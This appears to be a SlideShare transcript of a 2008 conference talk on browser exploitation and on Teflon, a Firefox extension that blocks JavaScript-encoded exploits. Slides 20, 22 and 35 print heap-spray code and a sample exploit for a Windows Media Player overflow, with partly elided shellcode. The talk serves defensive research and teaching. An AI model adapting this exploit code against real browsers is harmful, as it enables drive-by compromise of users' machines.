Your SlideShare is downloading. ×
0
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Teflon - Anti Stick for the browser attack surface

2,110

Published on

My presentation on browser exploitation and defense, at BA-Con 08, Buenos Aires.

My presentation on browser exploitation and defense, at BA-Con 08, Buenos Aires.

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,110
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface BA-Con 2008 – Buenos Aires
  • 2. <ul><li>Saumil Shah </li></ul><ul><ul><li>ceo, net-square solutions </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>dojo sensei: &quot;The Exploit Laboratory&quot; </li></ul></ul><ul><ul><li>author: &quot;Web Hacking - Attacks and Defense&quot; </li></ul></ul># who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash
  • 3. Web 2.0's attack surface <ul><li>It's all about the browser. </li></ul><ul><li>The browser is the desktop of tomorrow... </li></ul><ul><li>...and as secure as the desktop of the 90s. </li></ul><ul><li>The most fertile target area for exploitation. </li></ul><ul><li>What do today's browsers look like? </li></ul>
  • 4. Today's average browser
  • 5. Browser Architecture DOM HTML+CSS Javascript
  • 6. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc.
  • 7. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc. Ajax libs Ajax/rich apps
  • 8. The Browser is Desktop 2.0 &quot;Same Same But Different&quot;
  • 9. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Browser OS =
  • 10. The Browser – Kernel analogy HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps System Call libs Userland programs LibC C Runtime Browser Core Kernel DOM Kernel =
  • 11. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Plugin / Extensions Drivers =
  • 12. The Browser – Kernel analogy DOM HTML+CSS Javascript Ajax libs Ajax/rich apps Kernel System Call libs LibC C Runtime HTML / DHTML / JS Userland code <H1>hello world</H1> <script>alert('hi');</script> printf(&quot;Hello World &quot;); =
  • 13. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime <object>, <embed> syscalls <object clsid=&quot;XX-YYY-ZZ&quot;> <embed src=&quot;file.mp4&quot;> System Call libs exec(&quot;program.bin&quot;); open(&quot;file.mp4&quot;); =
  • 14. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime XHR Sockets xhr = new XMLHttpRequest() System Call libs s = socket(); =
  • 15. Browser &quot;syscalls&quot; HTML Loaded DOM Javascript HTML
  • 16. Browser &quot;syscalls&quot; HTML document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); DOM Javascript
  • 17. Browser &quot;syscalls&quot; document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); Javascript HTML DOM
  • 18. Exploiting a browser <ul><li>Built-in interpreted language – Javascript. </li></ul><ul><li>Craft the exploit locally, via JS. </li></ul><ul><li>Pre-load the process memory exactly as you like, thanks to HTML and JS. </li></ul><ul><li>Buffer overflows in browsers or components. </li></ul><ul><li>Practical exploitation – Return to heap. </li></ul>
  • 19. Exploiting a browser <ul><li>ASLR, DEP, NX, GS, Return to stack, Return to shared lib, ... doesn't bother us. </li></ul><ul><li>Spraying the heap, and then jumping into it. </li></ul><ul><li>Map the memory just-in-time. </li></ul><ul><li>Pioneered by Skylined. </li></ul><ul><li>&quot;Heap Feng Shui&quot; by Alexander Sotirov. </li></ul>
  • 20. Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
  • 21. How it all works stack heap code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP frames on the stack var1 var3 var2 var4 overflow in var 3
  • 22. The Heap...sprayed stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overflow in var 3 <script> : for(i = 0; i < 50; i++) a[i] = nops + shellcode; : </script> part of the heap gets &quot;sprayed&quot;
  • 23. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overwrite saved EIP AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr <object clsid=XXXXXXXX> exploit trigger in HTML code
  • 24. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr Hit one of the many sprayed blocks.
  • 25. Demo <ul><li>Step by step – building an exploit. </li></ul><ul><li>Firefox + Windows Media Player. </li></ul><ul><li>IE7 LinkedIn Toolbar. </li></ul>
  • 26. Exploits delivered by Javascript <ul><li>Build up the exploit on-the-fly. </li></ul><ul><li>and delivered locally. </li></ul><ul><li>Super obfuscated. </li></ul><ul><li>Randomly encoded each time. </li></ul><ul><li>&quot;Signature that!&quot; </li></ul>
  • 27. Browser defense <ul><li>Dynamic exploitation. </li></ul><ul><ul><li>Nothing blows up until the last piece of the puzzle fits. </li></ul></ul><ul><ul><li>Unless you are &quot;in&quot; the browser, you'll never know. </li></ul></ul><ul><li>Anti-Virus quack remedies. </li></ul>
  • 28. Effectiveness of Anti-Virus software <ul><li>Makes computers sluggish. </li></ul><ul><li>False alarms. </li></ul><ul><li>&quot;Most popular brands have an 80% miss rate&quot; – AusCERT. </li></ul><ul><li>Heuristic recognition fell from 40-50% (2006) to 20-30% (2007) – HeiseOnline. </li></ul><ul><li>Signature based scanning does not work. </li></ul><ul><li>A-I techniques can be easily beaten. </li></ul>
  • 29. New directions of R&D <ul><li>NoScript extension. </li></ul><ul><ul><li>slightly better than &quot;turn off JS for everything&quot;. </li></ul></ul><ul><ul><li>default deny, selected allow approach. </li></ul></ul><ul><ul><li>Per site basis – list building exercise. </li></ul></ul><ul><li>Analysis through Spidermonkey. </li></ul><ul><ul><li>Roots in understanding obfuscated malware. </li></ul></ul>
  • 30. New directions of R&D <ul><li>Hooking into the JS engine via debuggers. </li></ul><ul><ul><ul><li>http://securitylabs.websense.com/content/Blogs/2802.aspx </li></ul></ul></ul>
  • 31. Teflon <ul><li>An attempt to protect browsers against JS encoded exploits. </li></ul><ul><li>Doesn't allow anything to stick. </li></ul><ul><li>Per-site JS disabling is too drastic. </li></ul><ul><ul><li>or for that matter whitelisting/blacklisting. </li></ul></ul><ul><ul><li>I hate maintaining lists. </li></ul></ul><ul><li>Are you sure facebook won't deliver malware tomorrow? </li></ul>
  • 32. Teflon - objectives <ul><li>Deep inspection of payload. </li></ul><ul><li>Just block the offensive vectors. </li></ul><ul><ul><li>define offensive. </li></ul></ul><ul><ul><li>allow the rest. </li></ul></ul><ul><li>No need to disable JS. </li></ul><ul><ul><li>...just prevent the browser &quot;syscalls&quot;. </li></ul></ul><ul><li>Implemented as a browser extension. </li></ul><ul><li>Ideally this technology should be part of the browser's &quot;kernel&quot;. </li></ul>
  • 33. Teflon 0.2 <ul><li>Firefox 1.5-2.0 implementation. </li></ul><ul><li>Modifications to the DOM. </li></ul><ul><ul><li>document.write, innerHTML, eval, etc. </li></ul></ul><ul><li>Takes care of recursive javascript obfuscation. </li></ul><ul><li>Replaces offensive vectors with <div>s. </li></ul>
  • 34. Teflon 0.2 – lab tests <ul><li>Firefox+Windows Media Player (MS06-006) </li></ul><ul><li>http://milw0rm.com/exploits/1505 </li></ul><ul><li>Bare exploit - The Exploit Lab style! </li></ul><ul><li>Packed with /packer/ </li></ul><ul><ul><li>http://dean.edwards.name/packer/ </li></ul></ul><ul><li>Scriptasylum JS encoder/decoder </li></ul><ul><ul><li>http://scriptasylum.com/tutorials/encdec/encode-decode.html </li></ul></ul><ul><li>Both packer+encoder together. </li></ul>
  • 35. Plain vanilla exploit <script> // calc.exe var shellcode = unescape(&quot;%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000&quot;); // heap spray var spray = unescape(&quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; // we need approx 2200 A's to blow the buffer buf = &quot;&quot;; for(i = 0; i < 550; i++) buf += unescape(&quot;%05%05%05%05&quot;); buf += &quot;.wmv&quot;; document.write('<embed src=&quot;' + buf + '&quot;></embed>'); </script>
  • 36. /packer/
  • 37. Scriptasylum encoder/decoder
  • 38. Demo <ul><li>Teflon against plain vanilla exploit. </li></ul><ul><li>Teflon against /packer/. </li></ul><ul><li>Teflon against JS encoder. </li></ul><ul><li>Teflon against packer+encoder. </li></ul>
  • 39. Teflon 0.2 – in the wild <ul><li>Tested against www.cuteqq.cn malware. </li></ul><ul><li>Encrypted and randomized JS delivery. </li></ul><ul><li>MS07004 – IE VML bug. </li></ul>
  • 40. Without Teflon – 0wned
  • 41. Without Teflon – 0wned
  • 42. With Teflon – harmless div
  • 43. With Teflon – harmless div
  • 44. Teflon – practical deployment <ul><li>Right now, it is just a research prototype. </li></ul><ul><li>How shall we use it in practice? </li></ul><ul><li>Web servers can publish a &quot;manifest&quot; of what is allowed (or denied). </li></ul><ul><ul><li>e.g. &quot;My web pages should never contain OBJECTs or EMBEDs&quot; </li></ul></ul><ul><ul><li>or: &quot;Only CLSID xyz is allowed&quot; </li></ul></ul><ul><ul><li>maybe like P3P? (we all know where that went) </li></ul></ul>
  • 45. Teflon 0.2 - Limitations <ul><li>Javascript is too powerful (read dangerous). </li></ul><ul><li>&quot;I was here first!&quot; approach. </li></ul><ul><li>Teflon really needs to be built right into the browser. </li></ul>
  • 46. Where are browsers headed? <ul><li>Let's mash-up EVERYTHING. </li></ul><ul><li>Standards driven by bloggers and Twits. </li></ul><ul><li>We need a standard, granular security model for browsers – built in. </li></ul><ul><li>Web servers, app frameworks need to play a role too. </li></ul>javascript is everything WebSlices - WTF finally getting a decent UI totally on ACID fugly little snitch
  • 47. Future R&D directions <ul><li>Can we detect heap sprays? </li></ul><ul><li>Non-executable heap? it does exist... </li></ul><ul><li>Signed Javascript, JARs? </li></ul><ul><li>Browser &quot;syscall&quot; protection. </li></ul><ul><li>Weren't Java applets supposed to be perfect? :-) </li></ul>
  • 48. [email_address] Thank you BA-Con 2008 – Buenos Aires

×